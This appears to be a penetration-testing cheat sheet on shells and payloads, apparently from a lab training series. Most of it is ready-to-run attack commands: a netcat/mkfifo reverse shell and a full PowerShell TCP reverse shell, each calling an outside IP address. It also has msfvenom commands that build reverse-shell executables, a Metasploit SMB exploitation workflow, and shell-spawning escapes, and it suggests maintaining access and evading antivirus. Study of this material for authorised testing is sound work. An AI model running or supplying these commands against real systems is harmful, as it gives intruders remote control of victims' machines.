Shells & Payloads: Payloads Overview

Payloads Overview

Types of Payloads

Staged Payloads
- Sends initial stage first, then downloads main payload
- Better for environments with sufficient memory
- Example naming: windows/meterpreter/reverse_tcp
Stageless Payloads
- Entire payload sent at once
- Ideal for low-bandwidth environments
- Example naming: windows/meterpreter_reverse_tcp

Essential Payload Commands

Netcat/Bash Reverse Shell

rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/bash -i 2>&1 | nc 10.10.14.12 7777 > /tmp/f

PowerShell Reverse Shell

powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.10.14.158',443); $stream = $client.GetStream(); [byte[]]$bytes = 0..65535|%{0}; while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0) { $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes, 0, $i); $sendback = (iex $data 2>&1 | Out-String ); $sendback2 = $sendback + 'PS ' + (pwd).Path + '> '; $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2); $stream.Write($sendbyte,0,$sendbyte.Length); $stream.Flush() }; $client.Close()"

MSFvenom Payload Generation

List Available Payloads
```
msfvenom -l payloads
```

Linux Payload Creation

msfvenom -p linux/x64/shell_reverse_tcp LHOST=<attacker_IP> LPORT=<attacker_port> -f elf > payload.elf

Windows Payload Creation

msfvenom -p windows/shell_reverse_tcp LHOST=<attacker_IP> LPORT=<attacker_port> -f exe > payload.exe

Windows System Infiltration

Fingerprinting Windows Hosts

TTL Check via Ping

ping <target_ip>    # Look for TTL=128 or 32

Nmap OS Detection

sudo nmap -v -O <target_ip>
sudo nmap -v -A <target_ip>    # Aggressive scan

Key Windows Ports

139, 445: NetBIOS/SMB
135: MSRPC
443: HTTPS

Common Windows Payloads

DLLs: For privilege escalation and UAC bypass
Batch Files (.bat): Automation scripts
VBScript (.vbs): Client-side automation
MSI Files: Installation packages
PowerShell Scripts: System automation and exploitation

Metasploit Attack Workflow

# Start Metasploit
sudo msfconsole

# Search for exploit
search smb

# Configure exploit
use <exploit_number>
set RHOSTS <target_ip>
set SHARE ADMIN$
set SMBPass <password>
set SMBUser <username>
set LHOST <attacker_ip>

# Execute
exploit

Linux System Infiltration

Pre-Exploitation Checklist

Identify Linux distribution
Check available shells and programming languages
Determine system role (web server, database, etc.)
Look for application-specific vulnerabilities
Search for known CVEs

Interactive Shell Spawning Methods

Python TTY Shell

python -c 'import pty; pty.spawn("/bin/sh")'

Basic Shell Spawning

/bin/sh -i
perl -e 'exec "/bin/sh";'
ruby -e 'exec "/bin/sh";'
lua -e 'os.execute("/bin/sh")'
awk 'BEGIN {system("/bin/sh")}'

VIM Shell Escape

vim -c ':!/bin/sh'
# Or in VIM:
:set shell=/bin/sh
:shell

Permission Checks

# File permissions
ls -la <path/to/file>

# Sudo permissions
sudo -l

Best Practices

Pre-Exploitation

Always perform thorough reconnaissance
Document all findings and attempted exploits
Verify target scope and permissions

Post-Exploitation

Maintain access securely
Document all changes made to the system
Clean up after testing is complete

Security Considerations

Use staged payloads for better reliability
Consider antivirus evasion techniques
Always use secure channels for communication

PreviousShells & Payloads: Shell Overview NextShells & Payloads: Web Shells Overview